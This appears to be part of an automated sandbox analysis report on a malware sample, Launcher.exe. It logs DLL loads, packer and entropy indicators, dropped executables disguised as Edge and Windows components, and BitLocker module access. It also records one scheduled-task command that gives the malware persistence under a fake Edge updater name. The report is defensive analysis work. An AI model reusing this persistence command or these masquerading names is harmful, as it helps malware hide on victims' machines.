                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeSection loaded: msvcp140_clr0400.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Launcher.exeStatic PE information: More than 8191 > 100 exports found
                      Source: Launcher.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: Launcher.exeStatic file information: File size 57894039 > 1048576
                      Source: Launcher.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xe04c00
                      Source: Launcher.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2809000
                      Source: Launcher.exeStatic PE information: More than 200 imports for KERNEL32.dll
                      Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1238969388.000000000334D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
                      Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: qzemwxiuzucyxcx.exe.0.drStatic PE information: 0xA9D5AF7D [Fri Apr 16 15:06:37 2060 UTC]
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .themida
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name: .themida
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020DFCA push ecx; ret 28_2_0020DFDD
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_001E04DD push ebx; iretd 29_2_001E04E3
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_001E04F7 push ebx; iretd 29_2_001E04F9
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_001CA775 push es; iretd 29_2_001CA776
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0020DFCA push ecx; ret 29_2_0020DFDD
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00452068 push ebx; ret 29_2_00452069
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00451100 pushfd ; retn 0041h29_2_00451101
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00451D1A push es; retn 0042h29_2_00452065
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0045365F push esi; iretd 29_2_00453660
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009310F9 push FFFFFF82h; iretd 30_3_009310FB
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009344F9 push edx; retf 30_3_009344FC
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009328EC push edi; ret 30_3_009328F8
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00932C39 push ecx; ret 30_3_00932C59
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_0093525D push es; ret 30_3_00935264
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00933F89 push edi; iretd 30_3_00933F96
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00933FD4 push ss; retf 30_3_00933FF5
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009321DC push eax; ret 30_3_009321DD
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00934D5E push esi; ret 30_3_00934D69
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00930F6A push eax; ret 30_3_00930F75
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009310F9 push FFFFFF82h; iretd 30_2_009310FB
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009344F9 push edx; retf 30_2_009344FC
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009328EC push edi; ret 30_2_009328F8
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00932C39 push ecx; ret 30_2_00932C59
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_0093525D push es; ret 30_2_00935264
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00933F89 push edi; iretd 30_2_00933F96
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00933FD4 push ss; retf 30_2_00933FF5
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009321DC push eax; ret 30_2_009321DD
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00934D5E push esi; ret 30_2_00934D69
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00930F6A push eax; ret 30_2_00930F75
                      Source: xzuucncwbxucqic.exe.0.drStatic PE information: section name: .text entropy: 7.09207256696417
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name: entropy: 7.985393389809318
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name: entropy: 7.914561090197707
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name: entropy: 7.914561090197707
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeFile created: C:\ProgramData\WinUpdate32\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeFile created: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeFile created: C:\ProgramData\WinUpdate32\RuntimeBroker.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49718
                      Source: C:\Users\user\Desktop\Launcher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
